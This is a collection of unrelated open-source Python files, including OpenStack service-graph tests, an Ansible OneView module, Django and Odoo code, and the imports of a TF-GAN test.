) as pg2, self.port_pair_group(
port_pair_group={'port_pairs': [pp3['port_pair']['id']]},
do_delete=False
) as pg3, self.port_pair_group(
port_pair_group={'port_pairs': [pp4['port_pair']['id']]},
do_delete=False
) as pg4:
with self.port_chain(
do_delete=False,
port_chain={'port_pair_groups': [
pg1['port_pair_group']['id'],
pg2['port_pair_group']['id']]}
) as pc1, self.port_chain(
do_delete=False,
port_chain={'port_pair_groups': [
pg3['port_pair_group']['id'],
pg4['port_pair_group']['id']]}
) as pc2:
self._create_service_graph(self.fmt, {
'port_chains': {
pc1['port_chain']['id']: [
pc2['port_chain']['id']]
},
'name': 'abc',
'description': 'def'
}, expected_res_status=status)
def test_create_service_graph_branching_ppg_no_src_corr_fail(self):
self._test_create_service_graph_branching_ppg(None, 'mpls', 400)
def test_create_service_graph_branching_ppg_no_dst_corr_fail(self):
self._test_create_service_graph_branching_ppg('mpls', None, 400)
def test_create_service_graph_branching_ppg_both_corrs_ok(self):
self._test_create_service_graph_branching_ppg('mpls', 'mpls', 201)
def test_create_service_graph_linear_dependency_only(self):
# this test will create a graph consisting of 1 port chain being
# dependent on 1 other port chain, thus with no branching.
with self.port_pair_group(
port_pair_group={}, do_delete=False
) as pg1, self.port_pair_group(
port_pair_group={}, do_delete=False
) as pg2:
with self.port_chain(
do_delete=False,
port_chain={'port_pair_groups': [pg1['port_pair_group']['id']]}
) as pc1, self.port_chain(
do_delete=False,
port_chain={'port_pair_groups': [pg2['port_pair_group']['id']]}
) as pc2:
self._create_service_graph(self.fmt, {
'port_chains': {
pc1['port_chain']['id']: [pc2['port_chain']['id']]
},
'name': 'abc',
'description': 'def'
}, expected_res_status=201)
def test_create_service_graph_branching_no_class(self):
# this test will create a graph where 1 port chain will act
# as a dependency to 2 other port chains, effectively
# creating a branching service function chain.
with self.port_pair_group(
port_pair_group={}, do_delete=False
) as pg1, self.port_pair_group(
port_pair_group={}, do_delete=False
) as pg2, self.port_pair_group(
port_pair_group={}, do_delete=False
) as pg3:
with self.port_chain(
do_delete=False,
port_chain={'port_pair_groups': [pg1['port_pair_group']['id']]}
) as pc1, self.port_chain(
do_delete=False,
port_chain={'port_pair_groups': [pg2['port_pair_group']['id']]}
) as pc2, self.port_chain(
do_delete=False,
port_chain={'port_pair_groups': [pg3['port_pair_group']['id']]}
) as pc3:
self._create_service_graph(self.fmt, {
'port_chains': {
pc1['port_chain']['id']: [
pc2['port_chain']['id'],
pc3['port_chain']['id']
]
},
'name': 'abc',
'description': 'def'
}, expected_res_status=201)
def test_create_service_graph_same_chain_fail(self):
# this test will attempt to create a graph with a single branching
# point having 2 port chains - which are actually the same port chain.
with self.port_pair_group(
port_pair_group={}
) as pg1, self.port_pair_group(
port_pair_group={}
) as pg2:
with self.port_chain(
port_chain={
'port_pair_groups': [pg1['port_pair_group']['id']]
}
) as pc1, self.port_chain(
port_chain={
'port_pair_groups': [pg2['port_pair_group']['id']]
}
) as pc2:
self._create_service_graph(self.fmt, {
'port_chains': {
pc1['port_chain']['id']: [
pc2['port_chain']['id'],
pc2['port_chain']['id']
]
},
'name': 'abc',
'description': 'def'
}, expected_res_status=400)
def test_create_service_graph_with_already_used_pcs_fail(self):
# this test will attempt to create a graph that maps
# port-chains which have already been mapped to other graphs.
with self.port_pair_group(
port_pair_group={}, do_delete=False
) as pg1, self.port_pair_group(
port_pair_group={}, do_delete=False
) as pg2, self.port_pair_group(
port_pair_group={}, do_delete=False
) as pg3:
with self.port_chain(
do_delete=False,
port_chain={'port_pair_groups': [pg1['port_pair_group']['id']]}
) as pc1, self.port_chain(
do_delete=False,
port_chain={'port_pair_groups': [pg2['port_pair_group']['id']]}
) as pc2, self.port_chain(
do_delete=False,
port_chain={'port_pair_groups': [pg3['port_pair_group']['id']]}
) as pc3:
self._create_service_graph(self.fmt, {
'port_chains': {
pc1['port_chain']['id']: [
pc2['port_chain']['id']
]
},
'name': 'abc',
'description': 'def'
}, expected_res_status=201)
self._create_service_graph(self.fmt, {
'port_chains': {
pc3['port_chain']['id']: [
pc1['port_chain']['id']
]
},
'name': 'abc',
'description': 'def'
}, expected_res_status=409)
def test_create_service_graph_with_multiple_starts(self):
# this test will create a graph with multiple starting chains (tails)
with self.port_pair_group(
port_pair_group={}, do_delete=False
) as pg1, self.port_pair_group(
port_pair_group={}, do_delete=False
) as pg2, self.port_pair_group(
port_pair_group={}, do_delete=False
) as pg3, self.port_pair_group(
port_pair_group={}, do_delete=False
) as pg4:
with self.port_chain(
do_delete=False,
port_chain={'port_pair_groups': [pg1['port_pair_group']['id']]}
) as pc1, self.port_chain(
do_delete=False,
port_chain={'port_pair_groups': [pg2['port_pair_group']['id']]}
) as pc2, self.port_chain(
do_delete=False,
port_chain={'port_pair_groups': [pg3['port_pair_group']['id']]}
) as pc3, self.port_chain(
do_delete=False,
port_chain={'port_pair_groups': [pg4['port_pair_group']['id']]}
) as pc4:
self._create_service_graph(self.fmt, {
'port_chains': {
pc1['port_chain']['id']: [pc2['port_chain']['id']],
pc3['port_chain']['id']: [pc4['port_chain']['id']],
pc4['port_chain']['id']: [pc2['port_chain']['id']]
},
'name': 'abc',
'description': 'def'
}, expected_res_status=201)
def _test_create_service_graph_single_branching_two_fcs_each(
self, fc1_dict, fc2_dict, fc3_dict, fc4_dict, expected_res_status
):
with self.flow_classifier(
flow_classifier=fc1_dict, do_delete=False
) as fc1, self.flow_classifier(
flow_classifier=fc2_dict, do_delete=False
) as fc2, self.flow_classifier(
flow_classifier=fc3_dict, do_delete=False
) as fc3, self.flow_classifier(
flow_classifier=fc4_dict, do_delete=False
) as fc4:
with self.port_pair_group(
port_pair_group={}, do_delete=False
) as pg1, self.port_pair_group(
port_pair_group={}, do_delete=False
) as pg2, self.port_pair_group(
port_pair_group={}, do_delete=False
) as pg3:
with self.port_chain(
port_chain={
'port_pair_groups': [pg1['port_pair_group']['id']]
},
do_delete=False
) as pc1, self.port_chain(
port_chain={
'port_pair_groups': [pg2['port_pair_group']['id']],
'flow_classifiers': [
fc1['flow_classifier']['id'],
fc2['flow_classifier']['id']
]
},
do_delete=False
) as pc2, self.port_chain(
port_chain={
'port_pair_groups': [pg3['port_pair_group']['id']],
'flow_classifiers': [
fc3['flow_classifier']['id'],
fc4['flow_classifier']['id']
]
},
do_delete=False
) as pc3:
self._create_service_graph(self.fmt, {
'port_chains': {
pc1['port_chain']['id']: [
pc2['port_chain']['id'],
pc3['port_chain']['id']
]
},
'name': 'abc',
'description': 'def'
}, expected_res_status=expected_res_status)
def test_create_service_graph_unambiguous_branch(self):
# this test will create a graph where 1 port chain will act
# as a dependency to 2 other port chains, using different
# classifications for the dependent chains, which must succeed.
with self.port(
name='test1', do_delete=False
) as port1, self.port(
name='test2', do_delete=False
) as port2, self.port(
name='test3', do_delete=False
) as port3, self.port(
name='test4', do_delete=False
) as port4:
fc1_dict = {
'name': 'fc1',
'ethertype': 'IPv4',
'protocol': 'tcp',
'logical_source_port': port1['port']['id']
}
fc2_dict = {
'name': 'fc2',
'ethertype': 'IPv6',
'protocol': 'tcp',
'logical_source_port': port2['port']['id']
}
fc3_dict = {
'name': 'fc3',
'ethertype': 'IPv4',
'protocol': 'udp',
'logical_source_port': port3['port']['id']
}
fc4_dict = {
'name': 'fc4',
'ethertype': 'IPv6',
'protocol': 'udp',
'logical_source_port': port4['port']['id']
}
self._test_create_service_graph_single_branching_two_fcs_each(
fc1_dict, fc2_dict, fc3_dict, fc4_dict,
expected_res_status=201)
def test_create_service_graph_with_direct_loop_fail(self):
# this test will attempt to create a graph where there is a direct
# loop, i.e. a chain linked to itself - specifically pc2->pc2.
with self.port_pair_group(
port_pair_group={}, do_delete=False
) as pg1, self.port_pair_group(
port_pair_group={}, do_delete=False
) as pg2:
with self.port_chain(
do_delete=False,
port_chain={'port_pair_groups': [pg1['port_pair_group']['id']]}
) as pc1, self.port_chain(
do_delete=False,
port_chain={'port_pair_groups': [pg2['port_pair_group']['id']]}
) as pc2:
self._create_service_graph(self.fmt, {
'port_chains': {
pc1['port_chain']['id']: [pc2['port_chain']['id']],
pc2['port_chain']['id']: [pc2['port_chain']['id']]
},
'name': 'abc',
'description': 'def'
}, expected_res_status=400)
def test_create_service_graph_with_indirect_loop_fail(self):
# this test will attempt to create a graph where there is an indirect
# loop, i.e. a chain is linked to a chain providing a path back to
# the first chain again - specifically pc2->pc3->pc4->pc2.
with self.port_pair_group(
port_pair_group={}, do_delete=False
) as pg1, self.port_pair_group(
port_pair_group={}, do_delete=False
) as pg2, self.port_pair_group(
port_pair_group={}, do_delete=False
) as pg3, self.port_pair_group(
port_pair_group={}, do_delete=False
) as pg4, self.port_pair_group(
port_pair_group={}, do_delete=False
) as pg5:
with self.port_chain(
do_delete=False,
port_chain={'port_pair_groups': [pg1['port_pair_group']['id']]}
) as pc1, self.port_chain(
do_delete=False,
port_chain={'port_pair_groups': [pg2['port_pair_group']['id']]}
) as pc2, self.port_chain(
do_delete=False,
port_chain={'port_pair_groups': [pg3['port_pair_group']['id']]}
) as pc3, self.port_chain(
do_delete=False,
port_chain={'port_pair_groups': [pg4['port_pair_group']['id']]}
) as pc4, self.port_chain(
do_delete=False,
port_chain={'port_pair_groups': [pg5['port_pair_group']['id']]}
) as pc5:
self._create_service_graph(self.fmt, {
'port_chains': {
pc1['port_chain']['id']: [pc2['port_chain']['id']],
pc2['port_chain']['id']: [pc3['port_chain']['id']],
pc3['port_chain']['id']: [pc4['port_chain']['id']],
pc4['port_chain']['id']: [
pc2['port_chain']['id'],
pc5['port_chain']['id']
]
},
'name': 'abc',
'description': 'def'
}, expected_res_status=400)
def test_create_service_graph_with_inexistent_port_chains(self):
# this test will attempt to create a graph where one
# of the referenced port chains do not exist, and fail.
with self.port_pair_group(
port_pair_group={}, do_delete=False
) as pg1, self.port_pair_group(
port_pair_group={}, do_delete=False
) as pg2, self.port_pair_group(
port_pair_group={}, do_delete=False
) as pg3:
with self.port_chain(
do_delete=False,
port_chain={'port_pair_groups': [pg1['port_pair_group']['id']]}
) as pc1, self.port_chain(
do_delete=False,
port_chain={'port_pair_groups': [pg2['port_pair_group']['id']]}
) as pc2, self.port_chain(
do_delete=False,
port_chain={'port_pair_groups': [pg3['port_pair_group']['id']]}
) as pc3:
self._create_service_graph(self.fmt, {
'port_chains': {
pc1['port_chain']['id']: [pc2['port_chain']['id']],
pc2['port_chain']['id']: [
pc3['port_chain']['id'],
uuidutils.generate_uuid()
]
},
'name': 'abc',
'description': 'def'
}, expected_res_status=404)
def test_create_service_graph_with_joining_branches(self):
# this test will create a graph that including "joining" branches, i.e.
# a set of at least 2 branches that will be linked to the same next
# port chain, thus joining traffic at that point.
with self.port_pair_group(
port_pair_group={}, do_delete=False
) as pg1, self.port_pair_group(
port_pair_group={}, do_delete=False
) as pg2, self.port_pair_group(
port_pair_group={}, do_delete=False
) as pg3, self.port_pair_group(
port_pair_group={}, do_delete=False
) as pg4:
with self.port_chain(
do_delete=False,
port_chain={'port_pair_groups': [pg1['port_pair_group']['id']]}
) as pc1, self.port_chain(
do_delete=False,
port_chain={'port_pair_groups': [pg2['port_pair_group']['id']]}
) as pc2, self.port_chain(
do_delete=False,
port_chain={'port_pair_groups': [pg3['port_pair_group']['id']]}
) as pc3, self.port_chain(
do_delete=False,
port_chain={'port_pair_groups': [pg4['port_pair_group']['id']]}
) as pc4:
self._create_service_graph(self.fmt, {
'port_chains': {
pc1['port_chain']['id']: [pc2['port_chain']['id']],
pc2['port_chain']['id']: [
pc3['port_chain']['id'], pc4['port_chain']['id']
],
pc3['port_chain']['id']: [pc4['port_chain']['id']]
},
'name': 'abc',
'description': 'def'
}, expected_res_status=201)
def test_update_service_graph(self):
with self.port_pair_group(
port_pair_group={}
) as pg1, self.port_pair_group(
port_pair_group={}
) as pg2:
with self.port_chain(
port_chain={'port_pair_groups': [pg1['port_pair_group']['id']]}
) as pc1, self.port_chain(
port_chain={'port_pair_groups': [pg2['port_pair_group']['id']]}
) as pc2:
with self.service_graph(service_graph={
'name': 'test1',
'port_chains': {
pc1['port_chain']['id']: [pc2['port_chain']['id']]
}
}) as graph:
updates = {
'name': 'test2',
'description': 'desc2'
}
req = self.new_update_request(
'service_graphs', {'service_graph': updates},
graph['service_graph']['id']
)
res = self.deserialize(
self.fmt,
req.get_response(self.ext_api)
)
expected = graph['service_graph']
expected.update(updates)
for k, v in expected.items():
self.assertEqual(res['service_graph'][k], v)
req = self.new_show_request(
'service_graphs', graph['service_graph']['id']
)
res = self.deserialize(
self.fmt, req.get_response(self.ext_api)
)
for k, v in expected.items():
self.assertEqual(res['service_graph'][k], v)
def test_delete_service_graph(self):
with self.port_pair_group(
port_pair_group={}
) as pg1, self.port_pair_group(
port_pair_group={}
) as pg2:
with self.port_chain(
port_chain={
'port_pair_groups': [pg1['port_pair_group']['id']]},
) as pc1, self.port_chain(
port_chain={
'port_pair_groups': [pg2['port_pair_group']['id']]},
) as pc2:
with self.service_graph(service_graph={
'name': 'test1',
'port_chains': {
pc1['port_chain']['id']: [pc2['port_chain']['id']]
}
}, do_delete=False) as graph:
req = self.new_delete_request(
'service_graphs', graph['service_graph']['id']
)
res = req.get_response(self.ext_api)
self.assertEqual(204, res.status_int)
req = self.new_show_request(
'service_graphs', graph['service_graph']['id']
)
res = req.get_response(self.ext_api)
self.assertEqual(404, res.status_int)
req = self.new_show_request(
'port_chains', pc1['port_chain']['id']
)
res = req.get_response(self.ext_api)
self.assertEqual(200, res.status_int)
req = self.new_show_request(
'port_chains', pc2['port_chain']['id']
)
res = req.get_response(self.ext_api)
self.assertEqual(200, res.status_int)
|
bgxavier/neutron | refs/heads/master | neutron/tests/api/clients.py | 35 | # Copyright 2012 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_log import log as logging
from neutron.tests.tempest.common import cred_provider
from neutron.tests.tempest import config
from neutron.tests.tempest import manager
from neutron.tests.tempest.services.identity.v2.json.identity_client import \
IdentityClientJSON
from neutron.tests.tempest.services.identity.v2.json.token_client import \
TokenClientJSON
from neutron.tests.tempest.services.identity.v3.json.credentials_client \
import CredentialsClientJSON
from neutron.tests.tempest.services.identity.v3.json.endpoints_client import \
EndPointClientJSON
from neutron.tests.tempest.services.identity.v3.json.identity_client import \
IdentityV3ClientJSON
from neutron.tests.tempest.services.identity.v3.json.policy_client import \
PolicyClientJSON
from neutron.tests.tempest.services.identity.v3.json.region_client import \
RegionClientJSON
from neutron.tests.tempest.services.identity.v3.json.service_client import \
ServiceClientJSON
from neutron.tests.tempest.services.identity.v3.json.token_client import \
V3TokenClientJSON
from neutron.tests.tempest.services.network.json.network_client import \
NetworkClientJSON
CONF = config.CONF
LOG = logging.getLogger(__name__)
class Manager(manager.Manager):
"""
Top level manager for OpenStack tempest clients
"""
default_params = {
'disable_ssl_certificate_validation':
CONF.identity.disable_ssl_certificate_validation,
'ca_certs': CONF.identity.ca_certificates_file,
'trace_requests': CONF.debug.trace_requests
}
# NOTE: Tempest uses timeout values of compute API if project specific
# timeout values don't exist.
default_params_with_timeout_values = {
'build_interval': CONF.compute.build_interval,
'build_timeout': CONF.compute.build_timeout
}
default_params_with_timeout_values.update(default_params)
def __init__(self, credentials=None, service=None):
super(Manager, self).__init__(credentials=credentials)
self._set_identity_clients()
self.network_client = NetworkClientJSON(
self.auth_provider,
CONF.network.catalog_type,
CONF.network.region or CONF.identity.region,
endpoint_type=CONF.network.endpoint_type,
build_interval=CONF.network.build_interval,
build_timeout=CONF.network.build_timeout,
**self.default_params)
def _set_identity_clients(self):
params = {
'service': CONF.identity.catalog_type,
'region': CONF.identity.region,
'endpoint_type': 'adminURL'
}
params.update(self.default_params_with_timeout_values)
self.identity_client = IdentityClientJSON(self.auth_provider,
**params)
self.identity_v3_client = IdentityV3ClientJSON(self.auth_provider,
**params)
self.endpoints_client = EndPointClientJSON(self.auth_provider,
**params)
self.service_client = ServiceClientJSON(self.auth_provider, **params)
self.policy_client = PolicyClientJSON(self.auth_provider, **params)
self.region_client = RegionClientJSON(self.auth_provider, **params)
self.credentials_client = CredentialsClientJSON(self.auth_provider,
**params)
# Token clients do not use the catalog. They only need default_params.
self.token_client = TokenClientJSON(CONF.identity.uri,
**self.default_params)
if CONF.identity_feature_enabled.api_v3:
self.token_v3_client = V3TokenClientJSON(CONF.identity.uri_v3,
**self.default_params)
class AdminManager(Manager):
"""
Manager object that uses the admin credentials for its
managed client objects
"""
def __init__(self, service=None):
super(AdminManager, self).__init__(
credentials=cred_provider.get_configured_credentials(
'identity_admin'),
service=service)
|
e-gob/plataforma-kioscos-autoatencion | refs/heads/master | scripts/ansible-play/.venv/lib/python2.7/site-packages/ansible/modules/remote_management/oneview/oneview_fcoe_network.py | 147 | #!/usr/bin/python
# Copyright (c) 2016-2017 Hewlett Packard Enterprise Development LP
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: oneview_fcoe_network
short_description: Manage OneView FCoE Network resources
description:
- Provides an interface to manage FCoE Network resources. Can create, update, or delete.
version_added: "2.4"
requirements:
- "python >= 2.7.9"
- "hpOneView >= 4.0.0"
author: "Felipe Bulsoni (@fgbulsoni)"
options:
state:
description:
- Indicates the desired state for the FCoE Network resource.
C(present) will ensure data properties are compliant with OneView.
C(absent) will remove the resource from OneView, if it exists.
default: present
choices: ['present', 'absent']
data:
description:
- List with FCoE Network properties.
required: true
extends_documentation_fragment:
- oneview
- oneview.validateetag
'''
EXAMPLES = '''
- name: Ensure that FCoE Network is present using the default configuration
oneview_fcoe_network:
config: '/etc/oneview/oneview_config.json'
state: present
data:
name: Test FCoE Network
vlanId: 201
delegate_to: localhost
- name: Update the FCOE network scopes
oneview_fcoe_network:
config: '/etc/oneview/oneview_config.json'
state: present
data:
name: New FCoE Network
scopeUris:
- '/rest/scopes/00SC123456'
- '/rest/scopes/01SC123456'
delegate_to: localhost
- name: Ensure that FCoE Network is absent
oneview_fcoe_network:
config: '/etc/oneview/oneview_config.json'
state: absent
data:
name: New FCoE Network
delegate_to: localhost
'''
RETURN = '''
fcoe_network:
description: Has the facts about the OneView FCoE Networks.
returned: On state 'present'. Can be null.
type: dict
'''
from ansible.module_utils.oneview import OneViewModuleBase
class FcoeNetworkModule(OneViewModuleBase):
MSG_CREATED = 'FCoE Network created successfully.'
MSG_UPDATED = 'FCoE Network updated successfully.'
MSG_DELETED = 'FCoE Network deleted successfully.'
MSG_ALREADY_PRESENT = 'FCoE Network is already present.'
MSG_ALREADY_ABSENT = 'FCoE Network is already absent.'
RESOURCE_FACT_NAME = 'fcoe_network'
def __init__(self):
additional_arg_spec = dict(data=dict(required=True, type='dict'),
state=dict(default='present',
choices=['present', 'absent']))
super(FcoeNetworkModule, self).__init__(additional_arg_spec=additional_arg_spec,
validate_etag_support=True)
self.resource_client = self.oneview_client.fcoe_networks
def execute_module(self):
resource = self.get_by_name(self.data.get('name'))
if self.state == 'present':
return self.__present(resource)
elif self.state == 'absent':
return self.resource_absent(resource)
def __present(self, resource):
scope_uris = self.data.pop('scopeUris', None)
result = self.resource_present(resource, self.RESOURCE_FACT_NAME)
if scope_uris is not None:
result = self.resource_scopes_set(result, 'fcoe_network', scope_uris)
return result
def main():
FcoeNetworkModule().run()
if __name__ == '__main__':
main()
|
loic/django | refs/heads/master | django/db/backends/mysql/compiler.py | 691 | from django.db.models.sql import compiler
class SQLCompiler(compiler.SQLCompiler):
def as_subquery_condition(self, alias, columns, compiler):
qn = compiler.quote_name_unless_alias
qn2 = self.connection.ops.quote_name
sql, params = self.as_sql()
return '(%s) IN (%s)' % (', '.join('%s.%s' % (qn(alias), qn2(column)) for column in columns), sql), params
class SQLInsertCompiler(compiler.SQLInsertCompiler, SQLCompiler):
pass
class SQLDeleteCompiler(compiler.SQLDeleteCompiler, SQLCompiler):
pass
class SQLUpdateCompiler(compiler.SQLUpdateCompiler, SQLCompiler):
pass
class SQLAggregateCompiler(compiler.SQLAggregateCompiler, SQLCompiler):
pass
|
sysadminmatmoz/odoo-clearcorp | refs/heads/8.0 | purchase_delivery_invoice/wizard/stock_invoice_onshipping.py | 1 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Addons modules by CLEARCORP S.A.
# Copyright (C) 2009-TODAY CLEARCORP S.A. (<http://clearcorp.co.cr>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import osv, fields
from openerp.tools.translate import _
JOURNAL_TYPE_MAP = {
('outgoing', 'customer'): ['sale'],
('outgoing', 'supplier'): ['purchase_refund'],
('outgoing', 'transit'): ['sale', 'purchase_refund'],
('incoming', 'supplier'): ['purchase'],
('incoming', 'customer'): ['sale_refund'],
('incoming', 'transit'): ['purchase', 'sale_refund'],
}
class stock_invoice_onshipping(osv.osv_memory):
_name = 'stock.invoice.onshipping.delivery'
def _get_journal(self, cr, uid, context=None):
journal_obj = self.pool.get('account.journal')
journal_type = self._get_journal_type(cr, uid, context=context)
journals = journal_obj.search(cr, uid, [('type', '=', journal_type)])
return journals and journals[0] or False
def _get_journal_type(self, cr, uid, context=None):
if context is None:
context = {}
res_ids = context and context.get('active_ids', [])
pick_obj = self.pool.get('stock.picking')
pickings = pick_obj.browse(cr, uid, res_ids, context=context)
pick = pickings and pickings[0]
if not pick or not pick.move_lines:
return 'sale'
type = pick.picking_type_id.code
usage = pick.move_lines[0].location_id.usage if type == 'incoming' \
else pick.move_lines[0].location_dest_id.usage
return JOURNAL_TYPE_MAP.get((type, usage), ['sale'])[0]
_columns = {
'journal_id': fields.many2one('account.journal', 'Destination Journal',
required=True),
'journal_type': fields.selection(
[('purchase_refund', 'Refund Purchase'),
('purchase', 'Create Supplier Invoice'),
('sale_refund', 'Refund Sale'), ('sale',
'Create Customer Invoice')], 'Journal Type', readonly=True),
'group': fields.boolean("Group by partner"),
'invoice_date': fields.date('Invoice Date'),
}
_defaults = {
'journal_type': _get_journal_type,
'journal_id': _get_journal,
}
def onchange_journal_id(self, cr, uid, ids, journal_id, context=None):
if context is None:
context = {}
domain = {}
value = {}
active_id = context.get('active_id')
if active_id:
picking = self.pool['stock.picking'].browse(cr, uid, active_id,
context=context)
type = picking.picking_type_id.code
usage = picking.move_lines[0].location_id.usage if type == \
'incoming' else picking.move_lines[0].location_dest_id.usage
journal_types = JOURNAL_TYPE_MAP.get(
(type, usage), ['sale', 'purchase', 'sale_refund',
'purchase_refund'])
domain['journal_id'] = [('type', 'in', journal_types)]
if journal_id:
journal = self.pool['account.journal'].browse(cr, uid, journal_id,
context=context)
value['journal_type'] = journal.type
return {'value': value, 'domain': domain}
def view_init(self, cr, uid, fields_list, context=None):
if context is None:
context = {}
res = super(stock_invoice_onshipping, self).view_init(
cr, uid, fields_list, context=context)
pick_obj = self.pool.get('stock.picking')
count = 0
active_ids = context.get('active_ids', [])
for pick in pick_obj.browse(cr, uid, active_ids, context=context):
if pick.invoice_state != 'invoiced' and \
pick.carrier_invoice_control != '2binvoiced':
count += 1
if len(active_ids) == count:
raise osv.except_osv(_('Warning!'), _(
'None of these picking lists require invoicing.'))
return res
def open_invoice(self, cr, uid, ids, context=None):
if context is None:
context = {}
invoice_ids = self.create_invoice(cr, uid, ids, context=context)
if not invoice_ids:
raise osv.except_osv(_('Error!'), _('No invoice created!'))
data = self.browse(cr, uid, ids[0], context=context)
action = {}
journal2type = {'sale': 'out_invoice', 'purchase': 'in_invoice',
'sale_refund': 'out_refund',
'purchase_refund': 'in_refund'}
inv_type = journal2type.get(data.journal_type) or 'out_invoice'
data_pool = self.pool.get('ir.model.data')
if inv_type == "out_invoice":
action_id = data_pool.xmlid_to_res_id(
cr, uid, 'account.action_invoice_tree1')
elif inv_type == "in_invoice":
action_id = data_pool.xmlid_to_res_id(
cr, uid, 'account.action_invoice_tree2')
elif inv_type == "out_refund":
action_id = data_pool.xmlid_to_res_id(
cr, uid, 'account.action_invoice_tree3')
elif inv_type == "in_refund":
action_id = data_pool.xmlid_to_res_id(
cr, uid, 'account.action_invoice_tree4')
if action_id:
action_pool = self.pool['ir.actions.act_window']
action = action_pool.read(cr, uid, action_id, context=context)
action['domain'] = "[('id','in', ["+','.join(map(
str, invoice_ids))+"])]"
return action
return True
def create_invoice(self, cr, uid, ids, context=None):
context = dict(context or {})
data = self.browse(cr, uid, ids[0], context=context)
journal2type = {'sale': 'out_invoice', 'purchase': 'in_invoice',
'sale_refund': 'out_refund',
'purchase_refund': 'in_refund'}
context['date_inv'] = data.invoice_date
inv_type = journal2type.get(data.journal_type) or 'out_invoice'
context['inv_type'] = inv_type
active_ids = context.get('active_ids', [])
res = self.action_invoice_create_purchase_delivery(
cr, uid, active_ids, journal_id=data.journal_id.id,
group=data.group, type=inv_type, context=context)
return res
def action_invoice_create_purchase_delivery(
self, cr, uid, ids, journal_id, group=False, type='out_invoice',
context=None):
""" Creates invoice based on the invoice state selected for picking.
@param journal_id: Id of journal
@param group: Whether to create a group invoice or not
@param type: Type invoice to be created
@return: Ids of created invoices for the pickings
"""
picking_obj = self.pool.get('stock.picking')
context = context or {}
todo = {}
delivery_partner = {}
for picking in picking_obj.browse(cr, uid, ids, context=context):
if not picking.carrier_id:
raise Warning(_('The carrier is not set for this picking %s')
% picking.name)
partner = picking.carrier_id.partner_id.id
delivery_partner = picking.carrier_id.partner_id
# grouping is based on the invoiced partner
if group:
key = partner
else:
key = picking.id
for move in picking.move_lines:
if move.invoice_state == 'invoiced':
if (move.state != 'cancel') and not move.scrapped:
todo.setdefault(key, [])
todo[key].append(move)
invoices = []
ctx = context.copy()
ctx['partner_delivery'] = delivery_partner
ctx['invoice_delivery'] = True
for moves in todo.values():
invoices += picking_obj._invoice_create_line(
cr, uid, moves, journal_id, type, context=ctx)
return invoices
|
thisisshi/cloud-custodian | refs/heads/master | tests/data/__init__.py | 37 | # Copyright The Cloud Custodian Authors.
# SPDX-License-Identifier: Apache-2.0
|
odooindia/odoo | refs/heads/master | addons/account/wizard/account_report_central_journal.py | 378 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields, osv
class account_central_journal(osv.osv_memory):
_name = 'account.central.journal'
_description = 'Account Central Journal'
_inherit = "account.common.journal.report"
_columns = {
'journal_ids': fields.many2many('account.journal', 'account_central_journal_journal_rel', 'account_id', 'journal_id', 'Journals', required=True),
}
def _print_report(self, cr, uid, ids, data, context=None):
data = self.pre_print_report(cr, uid, ids, data, context=context)
return self.pool['report'].get_action(cr, uid, [], 'account.report_centraljournal', data=data, context=context)
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
ageron/tensorflow | refs/heads/master | tensorflow/contrib/gan/python/estimator/python/tpu_gan_estimator_test.py | 7 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for TF-GAN's TPU Estimator."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import shutil
import tempfile
from absl.testing import parameterized
import numpy as np
from tensorflow.contrib import layers
from tensorflow.contrib.gan.python import namedtuples as tfgan_tuples
from tensorflow.contrib.gan.python.estimator.python import tpu_gan_estimator_impl as estimator
from tensorflow.contrib.gan.python.losses.python import tuple_losses as losses
from tensorflow.contrib.tpu.python.tpu import tpu_config
from tensorflow.contrib.tpu.python.tpu import tpu_estimator
from tensorflow.contrib.tpu.python.tpu import tpu_optimizer
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.estimator import model_fn as model_fn_lib
from tensorflow.python.estimator.estimator import WarmStartSettings
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework.errors_impl import NotFoundError
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import metrics as metrics_lib
from tensorflow.python.ops import variable_scope
from tensorflow.python.platform import flags
from tensorflow.python.platform import test
from tensorflow.python.summary.writer import writer_cache
